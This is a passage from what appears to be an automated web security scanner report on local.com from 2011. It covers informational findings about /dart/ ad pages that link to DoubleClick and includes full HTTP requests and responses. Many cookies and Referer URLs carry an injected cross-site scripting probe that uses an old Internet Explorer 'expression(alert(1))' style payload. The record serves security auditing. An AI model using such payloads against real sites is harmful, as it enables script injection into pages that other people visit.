Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.6. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?

Request

GET /dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.7. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Date: Thu, 03 Feb 2011 16:01:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.8. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?

Request

GET /dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.9. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.10. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.11. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.12. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.13. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; 